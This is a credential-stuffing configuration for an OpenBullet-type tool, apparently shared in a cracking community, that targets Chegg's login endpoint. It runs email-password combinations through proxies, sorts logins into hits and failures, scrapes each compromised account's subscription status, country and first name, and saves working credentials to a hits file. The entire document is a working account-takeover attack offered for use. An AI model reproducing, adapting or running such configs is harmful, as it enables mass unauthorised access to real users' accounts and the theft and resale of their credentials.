[SETTINGS]
{
  "Name": "CHEGG",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2021-04-03T14:25:24.4398632+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "themutualguy",
  "Version": "1.0.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "JOIN US TECH DODGER https://t.me/teamdodgerofficial",
      "VariableName": "",
      "Id": 741949286
    },
    {
      "Description": "YOUTUBE CHANELE https://www.youtube.com/channel/UCZOWw9nA2wR-I9oV4lSCbpw",
      "VariableName": "",
      "Id": 1356356301
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://auth.chegg.com/auth/_ajax/auth/v1/login?clientId=CHGG" 
  CONTENT "clientId=CHGG&redirect_uri=&state=&responseType=&email=<USER>&password=<PASS>&version=2.124.29&profileId=CHGG" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9,ar-DZ;q=0.8,ar;q=0.7,fr;q=0.6" 
  HEADER "origin: https://www.chegg.com" 
  HEADER "referer: https://www.chegg.com/" 
  HEADER "sec-ch-ua: \"Google Chrome\";v=\"89\", \"Chromium\";v=\"89\", \";Not A Brand\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Email and password do not match." 
  KEYCHAIN Success OR 
    KEY "{\"result\":{\"authMethod\":\"" 

#ReP FUNCTION Constant "☢  ☢" -> CAP "𝐹𝓊𝓁𝓁 𝒞𝒽𝑒𝒸𝓀𝑒𝒹 𝐵𝓎 ✅" 

PARSE "<SOURCE>" JSON "uuid" -> VAR "uuid" 

PARSE "<SOURCE>" JSON "log_session" -> VAR "log_session" 

#GET_CAP REQUEST GET "https://www.chegg.com/my/account" 
  
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9,ar-DZ;q=0.8,ar;q=0.7,fr;q=0.6" 
  HEADER "referer: https://www.chegg.com/study?c_id=sem&utm_source=bing&utm_medium=cpc&utm_campaign=hwh--brand-Chegg_Misspellings&matchtype=e&gclid=1d2b206fe05613e481e54007bfd7d73e&gclsrc=3p.ds&&utm_source=bing&utm_medium=cpc&utm_campaign=hwh--brand-Chegg_Misspellings&ef_id=X5LRmwAABmdsyC3-:20210403122929:s" 
  HEADER "sec-ch-ua: \"Google Chrome\";v=\"89\", \"Chromium\";v=\"89\", \";Not A Brand\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" 

!PARSE "<SOURCE>" LR "C.global.hasHwhSubscription = " ";" CreateEmpty=FALSE -> CAP "SUB1" 

PARSE "<SOURCE>" LR "\\\"country_name\\\":" "\\\"," CreateEmpty=FALSE -> CAP "COUNTRY" 

PARSE "<SOURCE>" LR "subscriptionType\":\"" "\",\"fb_id" CreateEmpty=FALSE -> VAR "SUB" 

IF "<SUB>" Contains "NONE"

PARSE "<SOURCE>" LR "C.global.hasHwhSubscription = " ";" CreateEmpty=FALSE -> CAP "active sub " "" ">>CARD ADDED" 

ELSE
ENDIF

PARSE "<SOURCE>" LR "C.global.userFirstName = " "\\u0020';" CreateEmpty=FALSE -> CAP "USERNAME" 

KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "<SUB>" Contains "NONE" 
  KEYCHAIN Success OR 
    KEY "<SUB>" Contains "CANCELLED" 

FUNCTION Constant "themutualguy" -> CAP "" 

UTILITY File "hits of the config.txt" AppendLines "<USER>:<PASS>" 

